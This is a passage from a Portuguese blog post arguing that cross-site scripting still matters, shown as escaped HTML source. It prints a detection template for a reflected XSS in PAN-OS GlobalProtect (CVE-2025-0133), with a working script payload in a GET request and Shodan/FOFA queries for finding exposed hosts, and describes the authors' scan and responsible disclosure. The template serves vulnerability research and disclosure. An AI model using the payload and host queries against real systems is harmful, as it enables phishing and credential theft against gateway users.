&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;23
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;24
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;25
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;26
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;27
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;28
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;29
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;30
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;31
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;32
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;33
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;34
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;35
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;36
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;37
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;38
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;39
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;40
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;41
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;42
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;43
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;44
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id: CVE-2025-0133
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;info:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  name: PAN-OS - Reflected Cross-Site Scripting
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  author: xbow,DhiyaneshDK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  severity: medium
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  description: &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    A reflected cross-site scripting &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;XSS&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;s browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  reference:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    - https://security.paloaltonetworks.com/CVE-2025-0133
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    - https://hackerone.com/reports/3096384
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  classification:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    epss-score: 0.00102
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    epss-percentile: 0.29276
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  metadata:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    verified: true
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    max-request: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    shodan-query:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - http.favicon.hash:&amp;amp;#34;-631559155&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - cpe:&amp;amp;#34;cpe:2.3:o:paloaltonetworks:pan-os&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    fofa-query: icon_hash=&amp;amp;#34;-631559155&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    product: pan-os
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    vendor: paloaltonetworks
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  tags: hackerone,cve,cve2025,xss,panos,global-protect
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;http:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  - raw:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - |
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        GET /ssl-vpn/getconfig.esp?client-type=1&amp;amp;amp;protocol-version=p1&amp;amp;amp;app-version=3.0.1-10&amp;amp;amp;clientos=Linux&amp;amp;amp;os-version=linux-64&amp;amp;amp;hmac-algo=sha1%2Cmd5&amp;amp;amp;enc-algo=aes-128-cbc%2Caes-256-cbc&amp;amp;amp;authcookie=12cea70227d3aafbf25082fac1b6f51d&amp;amp;amp;portal=us-vpn-gw-N&amp;amp;amp;user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&amp;amp;amp;domain=%28empty_domain%29&amp;amp;amp;computer=computer HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        Host: {{Hostname}}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    matchers-condition: and
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    matchers:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - type: word
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        part: body
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        words:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;          - &amp;amp;#39;&amp;lt;/span&amp;gt;&amp;amp;lt;script&amp;amp;gt;prompt&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;XSS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;          - &amp;amp;#39;&amp;lt;/span&amp;gt;authentication cookie&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#39;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        condition: and
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      - type: status
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        status:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;          - &amp;lt;span class=&amp;#34;m&amp;#34;&amp;gt;200&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;c1&amp;#34;&amp;gt;# digest: 490a0046304402202037be3477c0e16d7bb7cfb9874bf1cb6894a1d8035d64115db72607a539a54502203a1dac9b97514abef71fdb6a73d681f64f788f43605f2235f1fbfd26f6ddac2c:922c64590222798bb761d5b6d8e72950&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Obtivemos um número significativo de hosts vulneráveis. Em seguida, tentamos identificar, entre esses resultados, quaisquer hosts que tivessem um VDP público, para que pudéssemos notificá-los sobre a vulnerabilidade. Essa etapa é um pouco complexa de ser realizada manualmente, por isso utilizamos inteligência artificial para cruzar os domínios extraídos do &amp;lt;b&amp;gt;&amp;lt;code&amp;gt;Shodan&amp;lt;/code&amp;gt;&amp;lt;/b&amp;gt; com informações disponíveis na internet sobre empresas que possuem programas de recompensa por bugs ou VDPs abertos.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Durante esta pesquisa, encontramos apenas dois domínios com VDPs públicos — um de uma grande empresa do setor privado e o outro de uma agência governamental. Ambos estão localizados nos Estados Unidos: um com um VDP hospedado no BugCrowd e o outro com um VDP privado, acessível por e-mail.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Relatamos ambas as vulnerabilidades às empresas de forma responsável.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-4.png&amp;#34;
	width=&amp;#34;1477&amp;#34;
	height=&amp;#34;318&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-4_hu_4ef3b501dfbf457c.png 480w, /articles/xss-nao-esta-morto/image-4_hu_b14be945089ea159.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;POC XSS Refletido em um dos alvos encontrados &amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;464&amp;#34;
		data-flex-basis=&amp;#34;1114px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-5.png&amp;#34;
	width=&amp;#34;1324&amp;#34;
	height=&amp;#34;691&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-5_hu_6322dbd059060c9c.png 480w, /articles/xss-nao-esta-morto/image-5_hu_9279a9a4ff7f61a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Divulgação Responsável via Bug Crowd&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;É importante destacar que a amostra testada representa apenas uma fração dos sistemas expostos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;mais-números&amp;#34;&amp;gt;Mais números
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Se você ainda não está convencido pela quantidade de XSS que temos por aí, podemos fazer outra pesquisa simples no &amp;lt;i&amp;gt;GitHub Advisory Database&amp;lt;/i&amp;gt;, onde obtemos um retorno de mais de &amp;lt;b&amp;gt;31.611 ocorrências relacionadas a XSS&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Se ainda não está convencido da quantidade de XSS que temos por ai, podemos fazer mais uma pesquisa simples no &amp;lt;em&amp;gt;GitHub Advisory Database&amp;lt;/em&amp;gt;  onde temos um retorno de mais de &amp;lt;strong&amp;gt;31.611 ocorrências relacionadas a XSS&amp;lt;/strong&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-6.png&amp;#34;
	width=&amp;#34;2692&amp;#34;
	height=&amp;#34;1404&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-6_hu_8944e16afc8c1393.png 480w, /articles/xss-nao-esta-morto/image-6_hu_aa853c3ed0f5991.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Pesquisa de XSS no GitHub Advisory Database&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;460px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma busca no banco de dados de &amp;lt;b&amp;gt;CVE (Common Vulnerabilities and Exposures)&amp;lt;/b&amp;gt; também revela um número significativo de vulnerabilidades registradas relacionadas ao XSS, demonstrando sua recorrência em diferentes sistemas, aplicações e contextos ao longo dos anos.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-7.png&amp;#34;
	width=&amp;#34;1096&amp;#34;
	height=&amp;#34;866&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-7_hu_dacb254ef186816c.png 480w, /articles/xss-nao-esta-morto/image-7_hu_272a9901a5e54f76.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Pesquisa de XSS no MITRE&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;126&amp;#34;
		data-flex-basis=&amp;#34;303px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Além disso, uma busca realizada na plataforma &amp;lt;b&amp;gt;HackerOne&amp;lt;/b&amp;gt;, amplamente reconhecida no ecossistema de &amp;lt;i&amp;gt;Bug Bounty&amp;lt;/i&amp;gt;, resulta em um total de &amp;lt;b&amp;gt;2.225 relatórios públicos&amp;lt;/b&amp;gt; envolvendo vulnerabilidades de Cross-Site Scripting. Esses dados reforçam não apenas a prevalência do XSS, mas também o interesse contínuo da comunidade de segurança em explorá-lo e relatá-lo, mesmo em ambientes com altos padrões de segurança.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-8.png&amp;#34;
	width=&amp;#34;1178&amp;#34;
	height=&amp;#34;831&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-8_hu_2eaf7efd23d706c8.png 480w, /articles/xss-nao-esta-morto/image-8_hu_c63b99d525b540c3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Pesquisa por XSS no Hacker One&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;141&amp;#34;
		data-flex-basis=&amp;#34;340px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;o-que-dá-para-fazer-com-um-xss-além-do-alert1&amp;#34;&amp;gt;O que dá para fazer com um XSS além do alert(1)?
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O famoso alert(1) costuma ser o primeiro exemplo usado para demonstrar uma falha de XSS. No entanto, os impactos reais dessa vulnerabilidade vão muito além de uma simples janela de alerta. Abaixo, listamos algumas ações maliciosas clássicas e conhecidas que podem ser realizadas por um invasor ao explorar uma falha de Cross-Site Scripting:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Roubo de Cookie&amp;lt;/b&amp;gt;, (se o cookie não estiver protegido com o sinalizador HttpOnly);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Sequestro de Sessão&amp;lt;/b&amp;gt;, assumindo a identidade da vítima em aplicativos autenticados;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Keylogging&amp;lt;/b&amp;gt;, capturando tudo o que o usuário digita na página comprometida;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Redirecionamentos Maliciosos&amp;lt;/b&amp;gt; para páginas falsas, com o objetivo de aplicar golpes;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Execução de ações em nome do usuário&amp;lt;/b&amp;gt;, como enviar mensagens, alterar configurações ou excluir dados;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Execução Remota de Código&amp;lt;/b&amp;gt;, embora rara e dependendo do contexto específico, pode ser possível obter acesso remoto a o sistema a partir de um XSS.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esses exemplos mostram que, embora o XSS seja uma vulnerabilidade frequentemente subestimada, ele pode ter consequências graves, especialmente quando explorado em aplicativos com dados confidenciais ou com alto nível de privilégio para o usuário afetado.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;conclusão&amp;#34;&amp;gt;Conclusão
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O XSS não morreu; talvez tenha sido apenas ignorado diante de novas ameaças mais &amp;#34;glamourosas&amp;#34;. Mas sua presença silenciosa continua a oferecer uma superfície de ataque explorável, muitas vezes com impacto crítico.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Apesar de frequentemente ser classificado como uma vulnerabilidade de gravidade &amp;lt;i&amp;gt;média&amp;lt;/i&amp;gt; ou mesmo &amp;lt;i&amp;gt;baixa&amp;lt;/i&amp;gt;, &amp;lt;b&amp;gt;o XSS não deve ser subestimado&amp;lt;/b&amp;gt;. &amp;lt;b&amp;gt;Seu impacto pode ser significativo, especialmente quando envolve roubo de cookies, sequestro de sessão ou redirecionamento para páginas maliciosas. E o que é mais perigoso: as proteções tradicionais nem sempre são suficientes para impedir que o usuário seja induzido a clicar naquele site de phishing que está usando uma URL legítima com uma vulnerabilidade XSS&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
